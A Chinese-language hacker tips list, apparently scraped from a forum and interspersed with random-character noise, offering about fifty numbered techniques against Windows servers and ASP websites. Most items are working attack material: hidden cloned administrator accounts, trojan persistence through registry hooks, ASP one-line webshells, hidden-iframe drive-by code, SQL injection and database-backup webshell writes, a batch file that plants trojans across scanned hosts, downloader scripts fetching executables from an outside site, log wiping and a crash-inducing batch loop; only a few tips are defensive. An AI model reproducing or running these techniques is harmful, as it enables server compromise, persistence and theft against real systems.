Xp系统修改权限防止病毒或木马等破坏系统,cmd下,. M2 R( U1 O$ m. d! X4 O$ Q& [
cacls C:\windows\system32 /G hqw20:R
. p, p1 O$ T/ \. @思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* @* `0 n Y! K3 v, w$ b6 e恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
0 ^8 W7 T/ q B
+ p; ^) d$ l+ K+ | c- ?2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 }$ P3 @* A* D8 t- h* \
5 t: M2 c$ E7 Q- k0 R6 C3 Y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
* i2 ]. ]6 H& f1 \6 A7 M! O
) [) l: \. h& Q4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号' k3 |0 ~1 H% Y
; u0 [ p" w4 o$ h
5、利用INF文件来修改注册表8 D2 b* x; ]' H$ o3 }$ p: K
[Version]
& {) {% T8 ^& q" I; wSignature="$CHICAGO$"* q# W) @* |: @ Y7 B0 g
[Defaultinstall]
" {. N& X1 T/ e4 ~addREG=Ating
+ Z, v# v0 x" W! Y/ H[Ating]; S* J/ ~8 t8 N7 M' l G
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 {( Y0 _- A% ^: V* o. M( c
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:( }8 W2 w1 b- l3 P3 w( N' }
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
% e2 s2 ?# a1 A9 Z4 o8 J; M4 n其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- ^# i F# D- ^( xHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU: _2 j q& h0 l, q8 F9 J
HKEY_CURRENT_CONFIG 简写为 HKCC J3 {7 y8 z- F% ^! |; n
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 X! f8 z! |. m2 }7 V"1"这里代表是写入或删除注册表键值中的具体数据
3 v7 G! ], T* H( L- l. w- k! w4 h: |$ o
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 a( g; W3 l, V x1 J E @$ f" n多了一步就是在防火墙里添加个端口,然后导出其键值
A( k+ W7 u& b: I[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]$ l! _; d& s: z2 i
! f7 a4 y. D; ?- ^* G. {
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" [ `- L1 q. y
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" T% N; b( \5 u, Y5 w7 k) q2 l& A
3 t1 V3 \" y. O" \4 ^. C( M
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
0 q, M" P( \5 t6 P
4 q7 ]; n& F, D" s6 E. d% J8 Q1 w9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,' k7 r" k2 N8 ?
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。4 e; Y d8 X5 ?; b# W Q# y
/ Q6 P% p$ n: \
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”* L* s) ^% k! X
, ~ v6 c* [' ]' G$ ]4 l) t11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,7 c" s3 |0 V" V0 h1 Q3 e# m* b9 s9 X( q
用法:xsniff –pass –hide –log pass.txt8 I3 c( G7 k( \
e. j- _! d* X/ t! J. o
12、google搜索的艺术
+ i% x0 R; E5 s搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 d/ j$ l+ U! m6 P* w6 e9 M或“字符串的语法错误”可以找到很多sql注入漏洞。7 U! f9 ?! ]0 w; _! x
6 }8 N; O: Z: R* V4 ]# o# l
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- a# s3 P% ?2 }3 ^" C* I
8 E4 c7 J1 G7 p1 u% j" U14、cmd中输入 nc –vv –l –p 1987
8 P( v( Q/ P' r2 Y- m' Z$ b! f1 P, c% r做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 \; r2 ^ J7 p4 D# U" _' S
+ Z* ?' U" F8 c" \7 S% l15、制作T++木马,先写个ating.hta文件,内容为: Z- b2 g; Z% Z; ]0 z6 z
<script language="VBScript">
' s3 q$ X+ r( f- p- }* r7 g a9 nset wshshell=createobject ("wscript.shell" )
4 @7 a1 D. G. [: Ca=wshshell.run("你马的名称",1) m5 V/ j. V7 Q3 I; ?
window.close$ p' d+ E* g! M6 |0 }0 S
</script> T+ O& p$ z4 C6 r* ?0 T/ E- F
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 t; T" x8 Y+ M& e' H
2 M; w3 u+ L& @0 m: S16、搜索栏里输入; m) z( E' B7 h: j; q
关键字%'and 1=1 and '%'=': E/ {# i |$ D5 s0 m- Y! e
关键字%'and 1=2 and '%'='
* A0 S6 h8 T$ [8 s. _比较不同处 可以作为注入的特征字符* I6 Z& x+ c: {0 {8 A
) y6 N5 [3 Q1 Q7 k( E
17、挂马代码<html>
' X7 i- q0 ?. p4 @& q# t<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& _/ f% i: ^% B& | k/ u
</html>
; H3 {" W1 L" @- V" i2 w* c& ^
! v1 p0 S% \! k% ]; x$ W: ]18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,6 L9 Q- i& z5 E a' T: Q
net localgroup administrators还是可以看出Guest是管理员来。- O) X" T: t' s2 [8 _
6 g0 z" z2 t- J; h19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
V9 y4 T9 x2 G- v Y' x用法: 安装: instsrv.exe 服务名称 路径8 ?- F( k* T0 A; H- G
卸载: instsrv.exe 服务名称 REMOVE
- u) j. C: I9 V' j: ~0 M+ Y0 v& E$ T6 l
/ A: d8 {' Q( z
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉! C# ^8 |: p/ G+ z
不能注入时要第一时间想到%5c暴库。7 y8 V* \& h: z. V6 `2 I, _1 `
9 a0 e9 n6 u4 A
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~6 B. X% `$ u0 P6 x
2 [5 s2 O) [% S9 R. z23、缺少xp_cmdshell时
/ m, i v" r. S! o# r( m尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 j V" s7 d) E假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 N/ T3 ^' @8 m0 r8 Ideclare @o int
2 @' {; X1 _4 ?5 I- _& lexec sp_oacreate 'wscript.shell',@o out
, Y. N( {" I9 I9 gexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ y7 d5 a. K: |& A6 k, U1 n) B* s+ a5 t5 ^9 e9 K4 v" G
24.批量种植木马.bat; k6 w+ Y9 O3 u% U$ ?# `) r
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中: h$ ]" B; @) y; i
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
) L' K; N" d* ?1 W% ~4 J扫描地址.txt里每个主机名一行 用\\开头
y& c3 \+ q1 k {
/ N1 v5 T+ g. {/ D \25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。$ }8 m L1 S- s
' A' j! H; }, m0 r3 y: o5 b+ Y) ]
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ j7 C3 O. V/ X7 A; z( a将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.1 t7 r8 o) c: [% T1 x
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
1 @! V- A- G) m: m4 P
, s5 k; ]" q- x5 M* A27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
3 M$ u7 H' H; D. P然后用#clear logg和#clear line vty *删除日志
* u' I4 M# Y& }/ c |& M8 K( m6 @; K6 L: Y. B
28、电脑坏了省去重新安装系统的方法! |0 N" u. H8 C
纯dos下执行,2 {3 C* X1 J2 ^% t6 U9 ]3 |2 y3 n& K3 c
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config) r! l2 F2 P. h6 J" w% I
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
6 d$ Z& u. M( F
2 J- N6 M2 A) {8 `6 O# ]29、解决TCP/IP筛选 在注册表里有三处,分别是:, K; h$ x7 r& E" O0 C" _& O
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- Q+ ?# t' _" s9 y' ~5 M# X& L" d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 R' ]' z3 j8 c {; x! Q+ @- F" S
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. U- ?/ M0 }2 p1 {' I1 Q. I
分别用+ y" R( a' z; y3 P- s
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 q! l8 i2 T. M" {0 r5 x( Qregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! H9 i, n6 i* A+ W6 d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 Y$ O9 X7 m" A0 |命令来导出注册表项
4 ^+ h9 M8 Q9 ^然后把三个文件里的EnableSecurityFilters"=dword:00000001,
/ M7 G @3 Y& G L4 }改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
( }9 y: z3 o- K0 d) P: H% gregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。1 A. c- M2 T' S( T
- v, {; ~! n) p5 ` F30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- x- C5 `( V, o) ]* u
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ |0 m' `: s: P) I* ?) p q
, V/ t, y- j" E0 m2 Y7 T X
31、全手工打造开3389工具* I0 s d" r, k! ~/ v: `
打开记事本,编辑内容如下:' K/ q7 |2 g0 z) n
echo [Components] > c:\sql
+ s) R7 i* K6 Y2 c' Y8 }5 z+ R7 h: U7 fecho TSEnable = on >> c:\sql
0 a. p" B9 \/ Z3 A: \9 {sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q. a$ i: P5 r1 V
编辑好后存为BAT文件,上传至肉鸡,执行9 Y, ~# C# E0 X2 d
9 b4 \; u/ v5 H; D- J+ L. [4 c/ G
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马7 ]4 o9 ]9 z* @) @# n4 B; F
+ U0 U' l) U* B8 d. c; c V33、让服务器重启5 D1 S7 J. r+ ^: Y: I
写个bat死循环:
% L& C* z9 Y6 e% r) @$ N@echo off
, x8 z2 d5 N- [& Z: k6 z:loop1
o, c x9 _& M0 _ pcls
+ m9 p- S# _1 }6 ?# T; ]' lstart cmd.exe8 S5 N) h; L7 d6 P8 b* B9 d
goto loop1
3 B3 `! w- O8 k- X4 w* H保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) ]6 ?0 K8 W8 Q4 l: M1 J
5 O0 e- j$ A; J; v& [34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
$ X- V" b: y* n1 E% ]' A3 l4 l@echo off) R" p3 V; D/ t5 i9 j2 L
date /t >c:/3389.txt
S O0 K/ m+ D# R- {. P9 Stime /t >>c:/3389.txt% t0 m9 t! e- Z# P2 t
attrib +s +h c:/3389.bat
P6 w/ J i v/ H4 ~5 Qattrib +s +h c:/3389.txt4 {. x0 R% Y, Q6 C1 W
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt& A$ Q! ^: v) `" P/ J! k i
并保存为3389.bat' c0 F! q7 s7 e9 n% a
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! y0 J [" F8 ?4 w0 ?/ D, }( L T, e7 R2 {
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
4 L' W4 b/ b0 x+ K5 c7 T7 Qstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)& a9 I" e1 N: y& B7 `0 V& _* E* `
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
4 r8 |1 h0 ^# B+ }2 P7 o7 j9 f8 n2 B3 E
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 V% m* w$ P! L+ A- j: [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址" T6 B9 M, Q4 {1 c/ `
echo 你的FTP账号 >>c:\1.bat //输入账号/ H) i1 R9 `& @& C, K
echo 你的FTP密码 >>c:\1.bat //输入密码
: i4 h. I. G A6 }4 |echo bin >>c:\1.bat //登入
# p. {" C, Q- Z8 yecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ f% a3 J3 u" V! R9 P: |echo bye >>c:\1.bat //退出
! y) \: ^; c4 _4 z! \然后执行ftp -s:c:\1.bat即可
% \, n9 F. L, p# Q$ Q+ s9 l. d( I# Q
37、修改注册表开3389两法: c$ R! ~( C/ r5 B$ V1 k8 j
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- @; Y2 [4 i3 ^& w0 a
echo Windows Registry Editor Version 5.00 >>3389.reg
) U! I$ U7 Q* S4 xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg: Q, w1 T" @- f" b- {
echo "Enabled"="0" >>3389.reg
* x( A$ R! ~7 w o, `echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" [' V5 w' B% j4 m# k1 @) l
NT\CurrentVersion\Winlogon] >>3389.reg3 _; Y* }5 R9 p, }2 |9 Q4 B
echo "ShutdownWithoutLogon"="0" >>3389.reg
* q; A$ s$ ^) Q& H, `( Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) f' T* m# ~3 N, `0 \) Q& U>>3389.reg
; B$ O2 a- R7 e9 G+ [echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 v4 a% |+ y( E" Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
. b! H* {8 G" L$ a+ Q/ ~>>3389.reg8 t' Q' K- {' x# F, H H
echo "TSEnabled"=dword:00000001 >>3389.reg
( Y, x2 ]7 ~3 _' T. Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 R! g E/ \. S8 ^6 `echo "Start"=dword:00000002 >>3389.reg
3 |+ [. q- }2 a8 S+ b0 H9 N! Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService], C. _4 N' ]; b8 G
>>3389.reg
9 _1 g/ x# J+ r1 e3 |echo "Start"=dword:00000002 >>3389.reg7 o, T. B( |& h6 Z9 ~
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg- e& s2 m& y$ h% f) P
echo "Hotkey"="1" >>3389.reg! ~2 ]7 a( A4 t' _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 q9 F L2 v8 B- m7 hServer\Wds\rdpwd\Tds\tcp] >>3389.reg1 ~, p7 ^. w& a6 L
echo "PortNumber"=dword:00000D3D >>3389.reg
8 s. [: T: [; O/ ^1 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; B8 p6 b5 U" ?: y; R! n' SServer\WinStations\RDP-Tcp] >>3389.reg& D8 `: K7 {' r+ k: ^+ g7 s
echo "PortNumber"=dword:00000D3D >>3389.reg
9 |4 [9 i* a1 l7 c把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。% Q3 C" E9 q; g m4 {7 L: J. S
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( ~% d- C6 W: d& o3 Y因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效. w& O( G: o( ~( w: C+ q& `, @
(2)winxp和win2003终端开启 J9 @7 j; s- T( g
用以下ECHO代码写一个REG文件:
" v p; q1 `. Y, F1 }$ N" @% l Gecho Windows Registry Editor Version 5.00>>3389.reg
/ m8 s' q& |, h/ o* V7 | M1 z8 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 T- B+ f- n$ X" O U9 bServer]>>3389.reg
, ]# p1 |6 c' B2 m7 Aecho "fDenyTSConnections"=dword:00000000>>3389.reg
1 f# S" i4 a, D, p1 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 m. }1 ?% ~) s
Server\Wds\rdpwd\Tds\tcp]>>3389.reg& q! Q3 \: v" y8 ?2 |: Q9 D# }
echo "PortNumber"=dword:00000d3d>>3389.reg
; l! T# Y% B9 M6 ?3 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 |: G5 j( o7 dServer\WinStations\RDP-Tcp]>>3389.reg8 f+ b$ ~% v$ P1 M6 D# B
echo "PortNumber"=dword:00000d3d>>3389.reg
' \( m' b# I% F( \0 {7 w然后regedit /s 3389.reg del 3389.reg8 y8 j7 K2 ?) B6 e9 K
XP下不论开终端还是改终端端口都不需重启
6 c |# Z( K4 B! O( H( J1 M$ M* w; w9 ^3 o# G$ G- J
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
5 }& j" E1 s6 G" c4 o用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
3 Q; ?& ~: R+ p+ v. x; | ^5 F! D+ w3 O
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
* I& S' z6 R* y7 r) F(1)数据库文件名应复杂并要有特殊字符7 a! Q' z. K/ L' e( W1 g, h" M0 @
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
9 S: E0 v' m) c+ ?2 H将conn.asp文档中的) Q/ G) J0 _. J; l* P: E* H/ d& }& C2 C
DBPath = Server.MapPath("数据库.mdb")' F! F0 |7 O+ z! ?3 e. A1 j+ V
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 \4 R8 {5 \8 H6 V
0 y7 r, Q; j9 Q修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置, b2 Z; m% _+ b3 y2 H
(3)不放在WEB目录里
' m3 [# d9 i; n; O7 \* Q+ C3 ~3 P8 M0 F: P( |0 V
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' ?! h9 |2 \) K4 r3 C$ U可以写两个bat文件
, K2 J% `+ k" g d; q. A@echo off8 _. s: M/ I5 B
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
* k u+ ^6 M' a9 U: p4 K@del c:\winnt\system32\query.exe8 \# ^: [! k! b: _
@del %SYSTEMROOT%\system32\dllcache\query.exe2 C$ @& p! ~8 i! r; v( k# f: x
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
+ X+ w0 m5 h8 e) F& y1 M
6 r" A% u2 J1 x2 J8 i1 M@echo off
5 N7 ^/ W3 T) s3 h@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- l* G3 L) _6 G( K% ]
@del c:\winnt\system32\tsadmin.exe& k. A4 @8 ^: P# F: q$ H
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: y& |& ?0 n6 i* |, s3 x. s! Y2 K S% \
41、映射对方盘符! r& u6 M- w! M6 z
telnet到他的机器上,
0 f2 I# Z1 }, M. {net share 查看有没有默认共享 如果没有,那么就接着运行' o$ R8 T( O" [6 @4 B
net share c$=c:
& F; g1 ^' c9 K" inet share现在有c$
, _+ H+ l8 g$ y2 f$ Y在自己的机器上运行+ M2 I: ^ X2 |/ U& Q
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# x3 e' b6 \6 R2 W/ s. Z5 c! |$ X r- |$ w
42、一些很有用的老知识. Y* I5 q5 C1 N A' w( i4 I. `
type c:\boot.ini ( 查看系统版本 ). `6 P. Z) ?4 A) P2 r
net start (查看已经启动的服务)
3 ^3 S Q1 \) A5 O% Q; [/ a- r+ jquery user ( 查看当前终端连接 )7 k" K1 \7 y* v" O- w
net user ( 查看当前用户 )
4 r% B2 A6 P% }& g4 L/ Y, r+ ?$ F* S% Wnet user 用户 密码/add ( 建立账号 )4 w1 l j6 a$ ]2 w h
net localgroup administrators 用户 /add (提升某用户为管理员) q+ Q' [) N! _3 U
ipconfig -all ( 查看IP什么的 ): b/ S4 X# A3 Z- ]- [' t0 u
netstat -an ( 查看当前网络状态 )+ D7 V1 |4 d/ T! n; q
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
: S: k- U+ `: f' j; r- U# W% F克隆时Administrator对应1F4: Q+ C" E' x8 F5 {2 O f
guest对应1F5
* d- K' I* H) o4 W1 xtsinternetuser对应3E8# ]# D& F# R; Y, A$ H* h5 |
, M/ O4 z; A# M* j
43、如果对方没开3389,但是装了Remote Administrator Service
& k0 J5 S) r3 F9 Y6 i! }用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接2 ~1 l+ D6 \; b3 Q5 L
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
8 L9 @0 B/ ]' i% D# F先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
- ?# d r) N# G/ S: V" A( D8 g6 N& x0 O
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)) s* p' z" w: L; v4 z0 u
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ q9 H: V% c+ N9 q
1 d/ ?( K2 h( [5 E* S/ ~3 p45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& l) c8 A9 u) y- f: u' n {echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
2 P H' Z! D. L$ z$ s) u1 j^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =& a2 b/ f' C3 N0 A5 O8 {% F
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 e6 q) u# o; ? I1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs3 t6 S9 R" H* V: o, B
(这是完整的一句话,其中没有换行符)
% n! k. q% {& v# \% I然后下载:
0 `- B4 O. x8 k8 ^) _5 p$ j3 |cscript down.vbs http://www.hack520.org/hack.exe hack.exe
; t" B% w6 J0 |5 F. a
. o5 d' _" Q; J. B46、一句话木马成功依赖于两个条件:
0 Z6 R8 z/ o! Q+ ]9 | M: |4 G1、服务端没有禁止adodb.Stream或FSO组件
2 k1 b3 }, E4 \1 U8 [) i: y2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
. m Y) r R# R0 \* W3 U2 E: C7 W8 |8 a5 L+ P& Q
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" A; @+ a0 p! Q4 F;alter database utsz set RECOVERY FULL--; ?$ {0 G% A& y
;create table cmd (a image)--
% ~! s* n" m n9 K: S Y1 ]$ G& l;backup log utsz to disk = 'D:\cmd' with init--6 W6 L$ |/ ^; L& U- A
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
1 R9 \5 V7 V6 b. ?9 v# o+ ]) Y;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
+ E+ U+ I) \2 w" O& U# N; Y" `注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: D+ h) u, S; @ \# s* Z9 P
9 W# }# E; _3 t) ^- ^* L48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
9 G8 }8 ]! N, R* M. i: S& _
1 ^' {3 z5 N5 d+ j用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, ]' A1 p' b" O6 v: R" \所有会话用 'all'。2 Y8 }! s/ T% f* y) Q/ j9 t
-s sessionid 列出会话的信息。
4 I1 P ~( A- O- P( [+ A+ p-k sessionid 终止会话。
3 N% H" B) S9 t8 h) J-m sessionid 发送消息到会话。6 j/ j/ l, W8 k4 \/ _ U
2 G+ Z: F. v8 [/ c6 t" N; l
config 配置 telnet 服务器参数。
2 g' i: |, p1 _$ I% d% W. T* T
; o: w! i/ [6 D- I9 ccommon_options 为:
5 `( m, s- {+ r7 @6 ? }6 ~' [6 m-u user 指定要使用其凭据的用户" A+ ]" p6 u6 Y; }" L K5 R+ C6 X
-p password 用户密码
. ?5 l+ L( Y: G, e0 b8 D+ M0 U5 Y0 w/ g
config_options 为:* _7 a1 Y( ^/ H9 w, D
dom = domain 设定用户的默认域+ |& |+ a7 X/ f0 ~9 |* k
ctrlakeymap = yes|no 设定 ALT 键的映射/ }. o" H+ y6 |! }; F: N
timeout = hh:mm:ss 设定空闲会话超时值/ }/ l2 V7 g- q( g7 e0 p' B- Z
timeoutactive = yes|no 启用空闲会话。/ D# z8 K2 t5 \) R
maxfail = attempts 设定断开前失败的登录企图数。
3 j v) c- k* M9 |) ^" ~* i& ?maxconn = connections 设定最大连接数。% P% b4 v1 g" O1 U8 F
port = number 设定 telnet 端口。
: r/ p8 n$ T+ q8 ssec = [+/-]NTLM [+/-]passwd Y# _2 W) V! t
设定身份验证机构1 T8 [5 o5 X& Q$ S1 H& p
fname = file 指定审计文件名。- m! Y" g! `: l
fsize = size 指定审计文件的最大尺寸(MB)。
( v$ W. b* ^- g+ Smode = console|stream 指定操作模式。2 O3 R+ q& E6 t. R- e( l9 Q2 i
auditlocation = eventlog|file|both
# y7 p8 N+ d/ V |& Y指定记录地点2 K H% z$ t# k6 v. H0 ^
audit = [+/-]user [+/-]fail [+/-]admin" b; h8 O0 g; I6 e+ D2 ^
3 i+ S9 r6 j \49、例如:在IE上访问:- h8 L9 _* y( K' G/ a
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 V8 z1 U v4 I) J/ \
hack.txt里面的代码是:
) k4 |) t6 b& G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 x' g; S( b" a把这个hack.txt发到你空间就可以了!
% Z! X3 v+ C) I' h* l- z这个可以利用来做网马哦!3 {& l! i" I" R3 X
r: N$ ~! [- q3 q& A- Y1 g50、autorun的病毒可以通过手动限制!9 m' y, R, Q3 A+ L9 P/ u4 R
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 [* H: r& S" Q0 e( @0 o2,打开盘符用右键打开!切忌双击盘符~ r9 \; V% z3 b) R
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' ^0 f" p* J$ ?" }- p Z
/ \# _+ A) z6 F# `& w" u51、log备份时的一句话木马:
+ f4 T* \3 O* u& G* d& T {a).<%%25Execute(request("go"))%%25>. l* |; U! M, E) X8 a! f
b).<%Execute(request("go"))%>
/ G% ?* x/ j( l' t- A" E! u5 {, G |c).%><%execute request("go")%><%5 Z, y: d% K, t; p' y9 p5 O4 R
d).<script language=VBScript runat=server>execute request("sb")</Script> M5 m; `$ F7 d& H) E R
e).<%25Execute(request("l"))%25>
& Y5 F% j3 Z9 w: Qf).<%if request("cmd")<>"" then execute request("pass")%>
! Z F( c {( q, g0 D' E% S
1 [# `7 e3 u- x1 O) F, m& `: F) V52、at "12:17" /interactive cmd
1 s9 T, E) y3 o* ]7 V' N2 f1 T6 T执行后可以用AT命令查看新加的任务3 g6 H b! ?7 M
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。& x$ n, q2 k6 N6 D
